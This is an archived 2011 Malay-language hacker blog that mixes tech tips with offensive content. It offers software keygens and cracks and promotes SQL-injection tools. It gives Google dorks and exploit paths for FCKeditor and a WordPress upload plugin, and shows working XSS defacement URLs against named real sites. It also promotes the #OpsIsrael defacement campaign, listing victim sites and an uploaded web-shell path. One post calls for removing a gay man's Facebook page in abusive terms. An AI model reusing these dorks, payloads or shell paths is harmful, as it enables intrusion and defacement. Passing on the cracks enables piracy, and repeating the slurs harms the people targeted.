Wednesday, 28 December 2011

Tune Up 2012 Keygen [MEDIAFIRE]

Assalammualaikum & Selamat Sejahtera,


Siapa yang gunakan Tune Up? Tune Up ne bagus untuk maintainkan PC korang dengan tools dia yang power2 kat dalam tu, Muz dah lama guna Tune Up ne dan memang best lah... Kat sini Muz nak share Tune Up 2012 Keygen yang dihasilkan oleh Muz dengan membuat beberapa refer dari google...

Sapa rasa2 nak pakai keygen ne boleh lah download ye... :D

Download daripada link MediaFire : http://www.mediafire.com/?ahsuym2d7ljyni2

Countdown 2012 Edisi UAI


Mohon disebarkan kepada yang lain, sambutlah malam tahun baru 2012 dengan amal ibadat kepada Allah S.W.T.

Amin

Hack In Paris (Call For Paper)



Tuesday, 27 December 2011

RC Proxy Grabber

Di sini saya nak share satu tools dengan korang semua, tools ne biasa-biasa saja iaitu RC Proxy Grabber . Tools ini dibuat menggunakan Visual Studio. Source Code tools ne dari sorang kawan saya iaitu Phiber_Optik...


Thursday, 22 December 2011

Sabily Uhud 11.10 Release


Bismillah Arrahman Arrahim,

Assalamo alaykom,

The Sabily team is proud to announce the release of the new version of Sabily 11.10, codename "Uhud".

Thursday, 8 December 2011

Menggerakan Pointer Mouse Menggunakan Mata

Assalammualaikum & Selamat Sejahtera...

Tadi masa jalan2 cari target kat google, jumpa plak benda ne yang rasanya best nak kongsi dengan korang semua...

Ini adalah satu perisian daripada sourceforge. Dimana perisian ini digunakan untuk mengawal tetikus dengan menggunakan muka dan mata.



Tuesday, 6 December 2011

Cara Memeriksa Windows Activation


Assalammualaikum & Selamat Sejahtera...


Di sini adalah beberapa trik yang jarang digunakan untuk memeriksa activation windows.


Thursday, 24 November 2011

180 Aplikasi Open Source Dari Zeusoft



Kini anda boleh memuatturun 180 open-source yang dikumpulkan dalam satu tempat di ZeuAPP 2.0. Antara perisian yang ditawarkan adalah perisian yang digunakan untuk Archivers, Audio, Video, Chat, Internet, CD Burners, File Sharing, Graphic, Text Editors, Office, Security, Utilities, Developer Tools, Runtimes, Other dan My Software.

Sabily 11.04 - OS Linux Berkonsepkan Islam



Sistem operasi Sabily ini adalah berasaskan kepada Ubuntu dan ianya dilengkapi dengan perlbagai tema dan perisian Islamik seperti Zekr dan Mushaf Othman (Perkakasan pengajian Quran), Minbar dan Firefox-praytimes (aplikasi waktu solat), Monajat (aplikasi yang memberi popup peringatan tentang waktu solat), Hijra (kalendar Islam) dan WebStrict ( perkakasan kawalan).

Versi terkini ialah versi 11.04 Badr. Untuk muatturun sila lawati laman Sabily di link ini :

Laman Perdana Menteri Malaysia digodam Hacker Indonesia


Salam sejahtera , tamatlah sudah perlawanan bola sepak ( akhir ) bagi sukan Sea 2011 dimana Malaysia berjaya memiliki pingat emas kerana berjaya menidakkan pemain Indonesia dengan kelebihan satu ( 1 ) gol penalti selepas seri satu ( 1 ) sama dengan pasukan garuda merah putih. Seperti yg dijangka , pastinya ada sesetengah pihak akan menggunakan alasan kekalahan ini bagi menyatakan rasa tidak puas hati mereka.


Sunday, 20 November 2011

Cara Reset Timer Perisian Trial


Kat sini kita akan mencuba untuk mereset masa bagi perisian trial. Biasanya ada orang yang buat clean uninstall untuk reset timer bagi sesuatu perisian trial. Namun cara itu agak melecehkan dan lambat.


Saturday, 19 November 2011

Scan QRCode Dalam Website Secara Terus

Assalammualaikum dan selamat sejahtera,

Sebelum ini saya ada post "Cara Membuat QRCode Blog Anda" & "Cara Menterjemahkan Mesej Di Sebalik Gambar QRCode". Kali ini saya akan berkongsi dengan anda cara untuk kita "Scan QRCode Dalam Website Secara Terus".

Thursday, 17 November 2011

Tutorial Cara Menggunakan IDM Crack For Life


Ramai juga lah yang bertanya macam mana nak guna benda ne, so kat sini saya akan terangkan sedikit cara penggunaan IDM Crack For Life ne...


Tuesday, 15 November 2011

Pelancaran Rasmi Komuniti

Assalammualaikum & Selamat Sejahtera,

Malam ne merupakan pelancaran rasmi untuk satu laman web iaitu Rileks Community, laman web ini adalah tempat untuk mereka yang ingin bersantai berkumpul bersama dalam satu komuniti...

Kurang daripada 5 minit sahaja lagi, forum komuniti akan dibuka jom dengarkan kami di http://radio.rc.my/ untuk membuat countdown bersama-sama....


Monday, 14 November 2011

Adakah Anda Cukup Selamat Di Atas Talian?

Mungkin ada yang sudah mengetahui mengenai perkara ini, ini adalah beberapa contoh fasiliti yang disediakan oleh PC Flank.

Melalui fasiliti yang disediakan kita boleh melakukan ujian ke atas sistem pengoperasian kita terutama dari ancaman serangan atas talian.


Simple VB Script - List All Files In Folder

Boring ne boleh lah main dengan vbscript plak, di bawah ne salah satu contoh vbscript yang digunakan untuk membuat list file yang ada dalam sebuah folder. Benda ini simple saja...


Dengarkan Kami Di RileksFM

Assalammualaikum dan selamat sejahtera semua,

Mana yang sibuk dengan kerja menghacking tu, jom rehat-rehat kejap dengarkan music... Jangan asyik pecahkan kod je, kang pecah kepala terover berfikir plak... Dan mana yang nak cari stesen radio terbaru... Jom join kami di RileksFM...


Sunday, 13 November 2011

Cara Mengesan Profile FB Melalui Gambar

Assalammualaikum dan Selamat Sejahtera,

Malam ne kita berkongsi lagi mengenai satu perkara, iaitu cara mendapatkan profile FB seseorang melalui gambar yang didownload daripada FB..


Proxy Finder Enterprise v2.5 [MediaFire]

Ini adalah proxy finder yang paling mudah digunakan dan mampu menghasilkan 6000-7000 proxy dalam tempoh masa tidak kurang dari 3 minit. Apa yang paling penting perisian ini tidak perlu install dan full edition enterprise.


Saturday, 12 November 2011

Cara Menukar Extension File

Ramai yang bertanya bagaimanakah menukar extension file seperti contoh file deface yang saya gunakan dalam FCK Link Gallery - File Uploader.

Baik di sini saya akan tunjukkan caranya "step by step".


Friday, 11 November 2011

FCK Link Gallery - File Uploader

Dork : inurl:fck/fcklinkgallery

Exploit 1 : providers/htmleditorproviders/fck/fcklinkgallery.aspx

Exploit 2 : javascript:__doPostBack('ctlURL$cmdUpload','')


Thursday, 3 November 2011

Jenis Bahasa Pemprograman WEB



Bagi mereka yang berkerja di dalam bidang web design pasti sudah tidak asing lagi dengan nama bahasa pemprograman. Bahasa pemprograman yang umum dikenali adalah HTML dan PHP. Tetapi sebenarnya masih banyak bahasa pemprograman yang perlu anda pelajari.


Spontaneous Thursday #9

Amal Yang Akan Kekal Sehingga Akhirat,

Adalah Bila Anda Mempunyai Ilmu,

Dan Mengajarkannya Pada Insan Yang Lain.

Wednesday, 2 November 2011

Perbezaan KBps dan Kbps

Sebenarnya banyak yang keliru mengenai perkara ini. Anda harus tahu bahawa KBps dan Kbps adalah dua perkara yang berbeza dalam sebutan yang sama.


Sunday, 30 October 2011

Cara Menterjemahkan Mesej Di Sebalik Gambar QRCode

Assalammualaikum...

Jika sebentar tadi kita telah membuat QRCode, kini kita akan menterjemahkan QRCode tersebut secara online. Dengan cara ini kita boleh membuat pesanan ringkas secara rahsia dengan menggunakan QRCode. Contoh kita hantar gambar QRCode kepada rakan kita dan di dalam gambar tersebut terdapat pesanan yang ingin kita sampaikan. Maka bagi menterjemahkan gambar QRCode kepada text yang boleh dibaca maka kita memerlukan QRCode "decode tools".


Cara Membuat QRCode Blog Anda

Bagi telefon pintar (smartphones) adalah kurang ramah pengguna dalam penggunaan sms dan navigasi laman web. Oleh itu QRCode atau Quick Response Code digunakan oleh kebanyakkan telefon pintar (smartphones) untuk memudahkan capaian ke laman web.



Saturday, 29 October 2011

SQL Poizon 1.1 - The Exploit Scanner

Perisian ini digunakan untuk menggunakan mencari website yang terdedah kepada suntikan SQL, selain itu tools ini juga boleh digunakan untuk mencari website yang terdedah kepada ancaman RFI dan LFI... Dorks anda boleh guna yang telah disediakan dalam tools ini atau masukkan secara manual... Nak saya masukkan? Tak rajin woo...


Debut Video Capture Versi 1.48 + Crack

Perisian ini digunakan untuk melakukan rakaman video. Bagus digunakan untuk membuat tutorial video atau merakam perbualan di YM, MSN atau lain-lain. Di datangkan dalam versi ringan tidak sampai 2 MB, kualiti video yang di hasilkan juga memuaskan dan amat jelas.


Proxy Leecher 6.5 - MediaFire

Perisian ini digunakan untuk mendapatkan senarai proxy untuk digunakan oleh pengguna proxy, tools ini amat kecil hanya sekitar 10 kb sahaja dan sudah pun di test oleh saya sendiri. Sekiranya anda kurang yakin sila run di dalam Sandbox....


Friday, 28 October 2011

Simple Flash Animation Tools - Mix-Fx

Perisian ini adalah untuk membuat fail flash yang simple yang rasanya boleh digunakan untuk buat header kat page deface korang. Benda ini simple dan mudah digunakan.


Tuesday, 25 October 2011

Sunday, 23 October 2011

Havij 1.15 With Exodus Patch - Portable

Memandangkan susah untuk mencari crack yang clean bagi Havij, Di sini saya share satu tools yang saya guna yang telah di patch oleh Exodus... Tools ne clean dan fully register...


Advanced Deface Page Creator - Beta Version

Bagi siapa yang masih buntu dalam membuat Deface Page, di sini satu tools untuk membuat Deface Page yang simple... Tapi tools ini masih dalam tahap beta... Tapi saya sudah cuba dan dapat digunakan dengan baik...


Saturday, 22 October 2011

Wordpress Exploit Easy Comment Upload

Title : Wordpress Exploit Easy Comment Upload

Dork : inurl:easy-comment-uploads/upload-form.php

POC :  /wp-content/plugins/easy-comment-uploads/upload-form.php


Fckeditor Uploader Defacement

Ini adalah satu POC lama menggunakan FCKEDITOR... Laman web yang akan digunakan adalah seperti di bawah kerana bukan semua laman web boleh menggunakan POC ini...



Tuesday, 18 October 2011

Apabila Si Bengang Mula Mengenali Facebook ...

Ada sorang lelaki ni. Dia nak blajar guna facebook. Dia SMS kawan dia untuk ajar macam mana cara nak buat facebook :

Lelaki : weh! Tolong ajar aku buat facebook bole tak?

Kawan : Boleh. Ko dah ada depan computer?

Lelaki : Dah. Aku dah ada email pun.

Kawan : cantekk! Ok, skrg ko bukak browser firefox atau internet explorer

Lelaki : browser tu ape?

Kawan : laa. Ko click menu start, pastu cari tulisan internet explorer

Lelaki : pastu?

Kawan : kat kotak paling atas, ko type 'www.facebook.com' pastu enter

Lelaki : oke! Pastu weh?

Kawan : kalo da kuar gambar, ko isi form pendaftaran sesuai yg ada

Lelaki : isi yg mana weh? Takde pape pun kat page ni

Kawan : takkan la takde pape? Kat page tu tulis apa?

Lelaki : paling atas cuma ada tulisan 'the page cannot be displayed'

Kawan : oh! Ko salah tulis dari awal tu

Lelaki : betul la aku type, www.facebook.com

Kawan : hm, mungkin connection internet ko mati

Lelaki : eh? Kene ada internet ye? Rumah aku takde internet

Kawan : cis. Senget! Jari aku sampai kerinting kasiktau ko. Rupenye rumah ko takde internet

Lelaki : hehe. Takpe la. Nanti kalau aku pergi cyber cafe aku sms ko lagi ye. Thanx ye

Kawan : sokey bro, email ko ape weh?

Lelaki : www.akuhensem2011@yahoo.com. Ada kawan aku buatkan. Aku belum pernah bukak lagi

Kawan : laa.. Mana ade email pakai 'www' kat depan. Alahaiii..

Lelaki : www tu ape weh?

Kawan : Wassalamualaikum Warahmatullahi Wabarakatuh ((bengang)) >:O


Kredit To : Dboyz Sierra

Sunday, 16 October 2011

Macam Di KK !!

Assalammualaikum...

Aku tak da benda nak tulis sebenarnya... So apa kita korang layan lagu ne yang di REMIX oleh member juga Deejay Khaizky... Tajuk lagu dia "Macam Di KK"... Sebenarnya ayat "Macam Di KK" tu selalu aku guna masa sekolah dulu... Tak sangka sekarang dah jadi lagu dan diremix member plak... Hahaha thank dude for the great song...

Zone Alarm 2012 Firewall + Serial Key


Sebelum ini saya telah berkongsi mengenai EDISI PENUH Zone Alarm Extreme Security 2012. Di sini pula bagi mereka yang hanya hendak menggunakan Zone Alarm Firewall tanpa Zone Alarm Anti-Virus. Zone Alarm Firewall 2012 ini juga turut disertakan bersama Serial Key untuk seumur hidup. Ini bermakna Zone Alarm Firewall 2012 anda tidak ada tarikh luput.


MEDIA FIRE

Zone Alarm 2012 Firewall + Serial Key


Zone Alarm Extreme Security 2012 + Serial Number


Memiliki Firewall dan Antivirus adalah penting bagi pengguna komputer yang kerap melayari Internet. Berikut adalah Firewall + Antivirus yang popular digunakan iaitu Zone Alarm. Zone Alarm telah melangkah lebih jauh dengan melancarkan perisian terbarunya iaitu Zone Alarm 2012 dalam 3 edisi. Di sini saya akan memberikan anda Edisi Penuh Zone Alarm 2012 iaitu Zone Alarm Extreme Security 2012 yang turut disertakan bersama serial number.

Zone Alarm Extreme Security 2011 Full Version + Serial Number

Saturday, 15 October 2011

Lu serupa macam sial lah !!

Assalammualaikum...

Hmm aku tak sangka plak gay ada FB, macam sial plak aku tengok... Tu lah masa aku lepak dengan member kat group tadi ada yang post link kata minta tolong HACK kan page someone... Sekali tengok page budak gay, memang macam sial... Entahlah fake ke tak aku pun tak tahu, tapi gambar manusia dalam page ne memang macam sial...



Aku harap-haraplah manusia dalam gambar ne sempat taubat... Memang nabi tak terima kau sebagai umat lah beb... Bersepah pompuan kat muka dunia ne, yang sejenis juga ko pilih... Apa ke hal?

Sapa-sapa kawan sedara Mark, sound-sound sikit minta padam page sial ne ok...


"Bertaubatlah sebelum pintu taubat tertutup"

Sejarah Perkembangan Unix/Linux Dan Windows?

Berikut adalah sejarah mengenai perkembangan Unix/Linux & juga Windows. Mengenai Unix ia tidak meliputi kesemuanya kerana perkembangan Unix terlalu banyak cuma perkara yang penting sahaja diambil kira.

Versi ini adalah dalam jenis PDF.


UNIX / LINUX HISTORY





WINDOWS HISTORY






KREDIT : SUMBER

Thursday, 13 October 2011

XSS Pada Facebook?

Assalammualaikum...

Rasanya dah lama tak update blog ne... Macam dah berhabuk je, traffic pun makin menurun... Hehe

Kali ne kita akan bercerita mengenai XSS atau Cross Site Scripting pada FACEBOOK? FACEBOOK? Oh no... Takpa kita tengok gambar dulu...


Amacam? Hehe... itu salah satu contoh sahaja bagaimana XSS berfungsi... Tapi yang saya buat tu hanya menggunakan menyebabkan ALERT.

Kalo betul Facebook kena XSS mesti ramai deactive akaun kan?

XSS atau Cross-site Scripting adalah satu malicious code yang di inject pada URL laman web untuk memaparkan Javascript kepada mereka yang membukanya.

Jom tengok contoh di bawah ne :

1. http://store.ferrari.com/en/search/show/?keywords=%3Cstyle%3Ebody{visibility:hidden;}html{background-image:url%28http://i27.lulzimg.com/9b6f618414.png%29;}%3C/style%3E%3Cdiv%20style=%22position:absolute;left:420px;top:40px;%E2%80%8B%E2%80%8Bz-index:10;visibility:visible;color:White;font-size:40px;%22%3E%3C/div%3E


2. http://www.gmp.police.uk/live/nhoodv3.nsf/index-divisions.html?ReadForm&Division=%3Cstyle%3Ebody{visibility:hidden;}html{background-image:url%28http://i27.lulzimg.com/9b6f618414.png%29;%20}%3C/style%3E%3Cdiv%20style=%22position:absolute;left:420px;top:40px;%E2%80%8B%E2%80%8Bz-index:10;visibility:visible;color:White;font-size:40px;%22%3E%3C/div%3E


Itu adalah contoh XSS daripada page Police UK dan Ferrari Store.

Dengan XSS, korang boleh curi cookie orang yang buka URL tersebut.

Tapi yang aku buat tadi, bukanlah untuk curi cookie, tetapi hanya menggunakan gambar aku dan letak kat Background web dorang secara sementara.

Bayangkan kalau terdapat XSS vulnerable pada Facebook. Memang asyik lawan hijack je la Facebook member.

Untuk lebih memahami XSS korang kenalah memahami JAVASCRIPT kerana korang akan menggunakan SCRIPT 100% dalam membuat XSS injection.

Monday, 10 October 2011

Insafnya Seorang Hacker

Entry copy paste dan diedit dari h3x0r <-- memang menginsafkan...

Memang seronok menerokai satu laman sesawang, lebih-lebih lagi laman sesawang yang ada vuln... Setelah dicari exploitnya maka aku berjaya mendapatkan username dan password lalu aku berjaya tembus ke admin panel... Aku terus melakukan kerja biasa aku iaitu homepage defacement dan mass defacement...

Lalu aku dengan rasa gembiranya menunjukkan kepada rakan aku yang aku panggil sebagai brot...

Aku : Brot, tengok ne aku dah defacement homepage dia woi...haha

Brot : Mane, bagi sini aku nak tengok...

Aku : Hebat kan aku brot?

Brot : Hebak sangatlah ko tu...

Aku : Fuh, aku dah siap upload file html aku, lepas ne nak post dekat group... Aku dah tukar sekali index untuk admin login dan read file dia... So lepas ne admin website ne dah tak boleh login ke website dia lagi...

Brot : Asal kau buat macam tu? Kau rasa bangga lah?

Aku : Banggalah brot... lagipun ini just for fun... lagipun kami security tester, aku buat macam ne untuk beri amaran admin tu patch website dia...

Lalu brot berkata dengan aku...

Bro... kalau kau buat macam ni apa hasil yang ko dapat? Kau gembira? Adakah dalam rasa gembira ko tu ko takda perasaan bersalah atau perasaan takut? Apa yang ko buat ne berdosa.. Walaupun niat ko nak tolong admin website tu... Tapi cara engkau salah, ko dah ganggu periuk nasi mereka... Kalau ko berterusan macam ne, ko tahu tak doa seorang yang dikhianati dan disakiti akan dimakbulkan oleh Allah... Biarpun niat ko baik, ikhlas nak tolong tapi ko mesti ada niat nak menunjuk-nunjukkan? Kalau betul ko nak tolong admin website tu napa ko nak post yang ko dah deface website tu dalam group? Bila datang ajal kau nanti... Pasti sakit saat engkau hendak meninggal dunia.. Susah engkau nak mati dan ketika kau nazak... Sebab dosa kau kepada admin itu tidak diampuni...



Berfikirlah kawanku sesungguhnya yang baik itu datang dari Allah Yang Maha Kuasa...

Sunday, 9 October 2011

9 Sebab Hacker Pencita Yang Setia?

Kepada wanita di luar sana... Ingin menjadikan computer geek atau hacker sebagai pasangan hidup? Berikut 9 sebab kenapa anda perlu melakukannya...


1. Kerana Hacker adalah type orang yang SETIA. Seperti mana Hacker setia kepada Computer nya, begitu juga Hacker setia kepada kekasihnya.


2. Kerana Hacker adalah type orang yang JUJUR. Show Me The Codes, prinsip mereka dan selalu terbuka untuk berkongsi pengalaman. Wanita suka mereka  yang jujur seadanya dan yang berfikiran terbuka.


3. Kerana Hacker adalah type orang yang FAIR. Tidak fair jika tidak membalas dendam dan tidak fair jika tidak menyerang balik :D.


4.  Kerana Hacker adalah type orang yang BERKONGSI. Prinsip berkongsi didalam komuniti maya yang disertai oleh Hacker membentuk peribadi Hacker yang siap berkongsi pendapat dengan kekasihnya.


5. Kerana Hacker adalah type orang yang MENGEKSPLORE. Mereka yang suka menjelajah ketempat-tempat yang belum pernah tersentuh. Jadi tahu bagaimana menakhluk hati seorang wanita dengan mengeksplorasi apa yang menjadi keinginan wanita.


6. Kerana Hacker adalah type orang yang INDIPENDENT. Mereka percaya pada prinsip Do It Yourself / Hack To Learn, Not Learn To Hack. Dari sini mereka akan belajar dari kesilapan dan tidak mengulangi kesalahan yang sama. Seperti itu juga didalam sebuah hubungan, Jika mereka melakukan kesilapan, merekan akan segera membetulkan kesilapan tersebut dan tidak mengulanginya lagi.


7. Kerana Hacker adalah type orang yang BEBAS, love freedom, berfikiran yang luas dan sentiasa Think Out Of The Box. Berfikir luar dari kotak pemikiran dan berfikir lebih dari maximum.


8. Kerana Hacker adalah type orang yang SERIUS dan BEKERJA KERAS, tekun memecah beribu code bahasa programming, membuat virus-virus baru etc,  that's totally awesome. :D


9. Kerana Hacker adalah type orang yang MYSTERIOUS. Selalu membuat kita tertanya-tanya tetapi hasil kerjanya ternyata menakjubkan.

10 Nasihat Untuk Orang Yang Bercinta

HANYA SELEPAS NIKAH !!

Dengarlah pesananan ini ~>

1. Janganlah kau membiarkan kemanisan bercinta dihirup sebelum engkau berkahwin dengan ‘si dia’.

2. Bercintalah kau dengannya sekadar sahaja. Kelak mungkin ‘si dia’ bukan jodoh untukmu.

3. Jika kau ingin berbahagia seumur hidup, tahanlah dirimu untuk berbahagia sebelum engkau berhak menjadi milik ‘si dia’.

4. Jika engkau menyintainya, binalah asas perkahwinan dengan tidak melanggar syariat-Nya.

5. Kebahagiaan yang kau lihat sebelum berkahwin hanya palsu, yang hakikatnya adalah selepas kau diijabkabulkan.

6. Jikalau engkau inginkan pasangan hidupmu yang terbaik dalam untukmu, maka engkaulah yang patut menjadi yang terbaik dahulu.

7. Membina keserasian sebelum berkahwin bukanlah dengan cara berdating, cukuplah sekadar engkau tahu apa yang perlu kau tahu.

8. Bercintalah untuk mencapai cinta-Nya.

9. Jika engkau masih belum bercinta, tahanlah dirimu untuk bercinta sehingga yakin cinta tersebut membawamu ke gerbang perkahwinan.

10. Jangan biarkan nafsumu dengan cinta yang tidak diterima di sisi Allah, kelak Allah akan tarik kebahagiaan darimu.

Selamat Bercinta Hingga Ke Syurga

Sapa dapat teka aku belanja...

Semalam aku jalan2 kat web jumpa exploits... Hehe

So senang je aku nak korang cari exploit apakah ini?




Friday, 7 October 2011

Selamat Tinggal Jasmine

Assalammualaikum...

Baru-baru ini saya terjumpa dengan satu profile di FB yang menghina ISLAM, pelaku ini terlalu angkuh mengutuk dan merendahkan martabat islam. Setelah sedikit penyiasatan dibuat ternyata selain menghina ISLAM, pemilik akaun ini juga turut menghina KRISTIAN, tujuan utamanya adalah untuk menimbulkan api kemarahan di antara umat ISLAM dan KRISTIAN.

Sungguh mengaibkan kerana manusia seperti ini masih hidup di muka bumi.


Diatas adalah gambar profile beliau... Dengan menggunakan gambar palsu beliau menghina ISLAM dan salah satu lagi profile beliau yang belum dapat dikesan turut menghina KRISTIAN....

Atas kerjasama kami dengan beberapa pihak, akaun FB ini telah dipadam untuk mengelakkan lagi ramai umat ISLAM datang ke sini dan membaca api kemarahan... Semoga pemilik FB ini cepat bertaubat sebelum terlambat....

Sekian, Wasalam...

Thursday, 6 October 2011

OpsIsrael Dimulakan


Apabila Hacker Indonesia + Malaysia bergabung untuk misi perdamaian maka OpsIsrael dimulakan...

Cara menyertai #OpsIsraeL

1 - Pentest / deface ( defacement perlu letak perkataan OpsIsraeL )
2 - notify @ zone-h ( notifier = OpsIsraeL )



LIST OF HACKED SITE IS HERE




INDONESIA + MALAYSIA 
D        A       M        A         I



Penyokong ( supporter ) OpsIsraeL
------------------------------------
 Malaysia
RileksCrew
h3x4g0n
Dragon Force
Newbie3viLc063s 
Cyb3rSec Crew
We Are Programmers From Malaysia
Malaysian Hackers Federation
Buloh Crew
Phantom Crews
GaySec
AhliSyurgaCrew
Cyb3r 4rmy Army Putera
WAHFM

Indonesia
Aceh Cyber Team
Jatim Crew
Manusia Biasa Team
Medan Cyber Team
Pekan Baru Cyber Crew
Indonesian Defacer
Indonesia BlackHat Team
Yogyacarderlink
Fast Hacker Team
Recyle Bin-666
Notepad-666
Error-404
Indonesian Coder

Pakistan
Pak Cyber Army

Singapura
TH3 S4cR1FAC3

Blogger

Forum

FB Fanpage OpsISRAEL

Hacked Isreal site :
http://www.o-tech.co.il/ ( HiddenPain )
http://www.eliteal.co.il/ ( Dragon Force )
http://www.combomusic.co.il/index.php ( Newbie3viLc063s )
http://www.dantex.co.il/%D7%9E%D7%91%D7%A6%D7%A2%D7%99%D7%9D/tabid/76/articleType/ArticleView/articleId/8/------------.aspx ( Dragon Force )
http://israelpr.info/index.html ( Pak Cyber Army )
101.co.il/index.html ( Pak Cyber Army )
http://www.israevents.com/index.html ( Pak Cyber Army )
http://www.israelparalympics.org/index.html ( Pak Cyber Army )
http://live-chat.co.il/index.html ( Pak Cyber Army )
http://just-be.co.il/index.html ( Pak Cyber Army )
http://campusevent.co.il/index.html ( Pak Cyber Army )
http://ulpaney-rishon.co.il/index.html ( Pak Cyber Army )
http://liats-stuff.co.il/index.html ( Pak Cyber Army )
http://agile.org.il/hacked.php ( SonTurk )
www.av-on.co.il ( SLYHACKER )
www.gta.co.il ( Gaza Hacker Team )  
bsav.co.il ( Gaza Hacker Team )
haifacom.co.il ( TNT_HACKER )       


Shell Uploaded Israel site :
http://or-srv.co.il/portals/0/dboyz.asp;.txt

Monday, 3 October 2011

Kunjungan Semula

Assalammualaikum,

Wah rasanya dah lama sangat muz tak update blog ne... Dah bersarang dah labah-labah... Penat bersihkan tadi.. Anyway muz pun dah tak berapa aktif dah, sebabnya entahlah... Rasanya dah penat kot... Haha... Muz prefer kepada berforum... Anyway tak lama lagi kita akan tinggalkan 2011 dan masuk 2012... Cepatnya masa berlalu... Rasanya macam tak rasa apa-apa kat tahun ne... Hmm

Tuesday, 27 September 2011

Semua Tentang Bahasa Programming

Mempelajari bahasa programming adalah basic bagi seorang pakar komputer, tanpa mempelajari asas programming macam mana anda hendak jadi hacker? Nak tafsir apa yang cuba disampaikan kat l337 pun tak tau, cuma copy paste je... So jom belajar bahasa programming...

Python :
Bahasa programming yang biasa digunakan pakar komputer dan selalu digunakan untuk menulis exploit.

Learn Python The Hard Way : http://learnpythonthehardway.org/static/LearnPythonTheHardWay.pdf
Python Wikibooks : http://en.wikibooks.org/wiki/Subject:python_programming_language
Python Ebooks : http://www.onlinecomputerbooks.com/free-python-books.php
Pyton Oleh Grey Hat Hacker : http://oreilly.com/catalog/9781593271923
http://docs.python.org/

Ruby :
Bahasa programming utama yang digunakan untuk menulis exploit dan metasploit tools.

Wikibooks Ruby : http://en.wikibooks.org/wiki/Subject:Ruby_programming_language
Little Book Of Ruby : http://www.sapphiresteel.com/IMG/pdf/LittleBookOfRuby.pdf
Ruby Programmers Guide : http://www.ruby-doc.org/docs/ProgrammingRuby/
E-book : http://www.onlinecomputerbooks.com/free-ruby-books.php

Perl :
Bahasa programming lama tapi masih banyak digunakan.

O'Reilly Learning Perl : http://www.amazon.com/Learning-Perl-5th-Randal-Schwartz/dp/0596520107/ref=sr_1_1?ie=UTF8&s=books&qid=1280901933&sr=8-1

C / C + + :
Ini adalah satu bahasa programming yang sangat penting. Anda tidak akan mampu memahami semuanya, tetapi apabila selesai di bahagian ini, anda akan mempunyai pengetahuan yang baik dalam bahasa programming C / C + +.

Cprogramming.com : http://cprogramming.com/
C Tutorial : http://www.java2s.com/Tutorial/C/CatalogC.htm
Beej's Guide to C Programming : http://beej.us/guide/bgc/
E-book : http://www.onlinecomputerbooks.com/free-c-books.php

Assembly :
Skullsecurity: Assembly : http://www.skullsecurity.org/wiki/index.php/Fundamentals
Windows Assembly Programming Tutorial : http://www.acm.uiuc.edu/sigwin/old/workshops/winasmtut.pdf
http://en.wikibooks.org/wiki/X86_Assembly
The Art of Assembly : http://homepage.mac.com/randyhyde/webster.cs.ucr.edu/index.html
Assembly primer for hackers : http://www.securitytube.net/Assembly-Primer-for-Hackers-%28Part-1%29-System-Organization-video.aspx
PC Assembly Language : http://www.drpaulcarter.com/pcasm/

Programming Windows :
Membantu kita untuk memahami program yang kita gunakan termasuk struktur yang terlibat dalam sistem operasi windows kita. Bahasa ini amat penting selepas kita menjalankan exploit ke atas windows.

Windows Programming : http://en.wikibooks.org/wiki/Windows_Programming
Windows API Tutorial : http://www.relisoft.com/win32/index.htm
Windows Sysinternals : http://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Dstripbooks&field-keywords=windows+sysinternals&x=0&y=0
Windows Internals 4 : http://www.amazon.com/Microsoft-Windows-Internals-4th-Server/dp/0735619174

Disassembly :

http://en.wikibooks.org/wiki/X86_Disassembly
The Art of Disassembly - http://tuts4you.com/download.php?view.187

Selain itu anda juga harus belajar untuk memahami bahasa linux selain daripada windows.

Sunday, 25 September 2011

Top 10 Hacker (Malay version) - Part 7

Mafia Boy

Penggodam komputer ini dikenali sebagai "Mafiaboy," telah menyebabkan kerosakan kepada beberapa buah laman web utama di internet termasuklah CNN. Beliau telah mengaku bersalah di mahkamah Montreal, Canada pada Khamis, 18 Jan 2001. Beliau mengaku bersalah di atas 55 dakwaan salahlaku daripada 66 yang didakwa ke atasnya. Pendakwaan yang dijalankan kepadanya yang baru berusia 16 tahun pada ketika itu menyebabkan identitinya terpaksa dirahsiakan dibawah undang-undang Canada. Beliau telah disabitkan dengan 66 kesalahan yang berkaitan dengan serangan internet pada tahun lepas terhadap beberapa laman web utama dan juga security breaches of laman web institusi pendidikan seperti University Yale dan Harvard.

-----------------------------------------------------------------------------------------
Mark Abene

Dilahirkan pada tahun 1972, lebih dikenali dengan nama samarannya iaitu Phiber Optik, ialah seorang penggodam komputer dari New York City. Phiber Optik juga pernah menjadi anggota kumpulan penggodam terkemuka iaitu Legion of Doom dan Masters of Deception. Pada tahun 1994, beliau telah dipenjarakan selama setahun kerana terbabit dengan beberapa konspirasi dan kesalahan memecah-masuk ke dalam rangkaian sistem komputer dan sistem telefon. Phiber Optik juga adalah merupakan seorang penggodam yang berprofil tinggi di awal tahun 1990an. Beliau telah muncul di dalam tabloid terkemuka seperti The New York Times, Harper’s, Esquire, dan berdebat di televisyen. Pada tahun 1995, Phiber Optik juga memainkan peranan sebagai watak yang penting di dalam sebuah buku bukan fiksyen iaitu Masters of Deception — The Gang that Ruled Cyberspace.

Top 10 Hacker (Malay version) - Part 6

Lloyd

Dalam terma kemanusiaan, ianya berkait rapat dengan kes amanah, seorang pekerja yang telah berkhidmat selama 11 tahun telah pecah amanah. Lloyd telah membina dan membangunkan rangkaian komputer Novell NetWare di Omega South dan kemudian telah menjahanamkan ia kembali dengan sebuah perisian yang bertindak seperti bom jangka selepas nama beliau digugurkan dari kalangan korporat dan dipecat kerana masalah prestasi kerja dan juga masalah disiplin yang teruk. Hari ini, beliau sedang berdepan dengan hukuman lima tahun penjara.



In a business sense, the loss of its key manufacturing programs cost Omega, which builds measurement and instrumentation devices for customers like NASA and the U.S. Navy, more than $10 million, dislodged its footing in the industry and eventually led to 80 layoffs.
Insiden pada tahun 1996 itu telah diberi perhatian yang serius hingga membawa kepada kerjasama antara U.S. Secret Service dengan para pakar pemulih data dan ahli forensik digital terkemuka dunia untuk menyiasat kes Llyod tersebut bagi membolehkan Lloyd ditahan dan dibicarakan kerana kesalahannya itu.

-----------------------------------------------------------------------------------------


David Smith

David Smith, merupakan seorang pencipta virus Melissa, bakal berdepan dengan hukuman penjara selama hampir 40 tahun jika beliau memutuskan untuk tidak bekerjasama dengan pihak FBI.



Berdepan dengan hukuman penjara, kemarahan masyarakat dan juga bakal didenda, penyebar virus Melissa yang paling cepat merebak ini akhirnya melakukan seperti apa yang telah dilakukan oleh beratus penjenayah sebelum ini. Beliau telah bersetuju untuk menjadi seorang undercover.



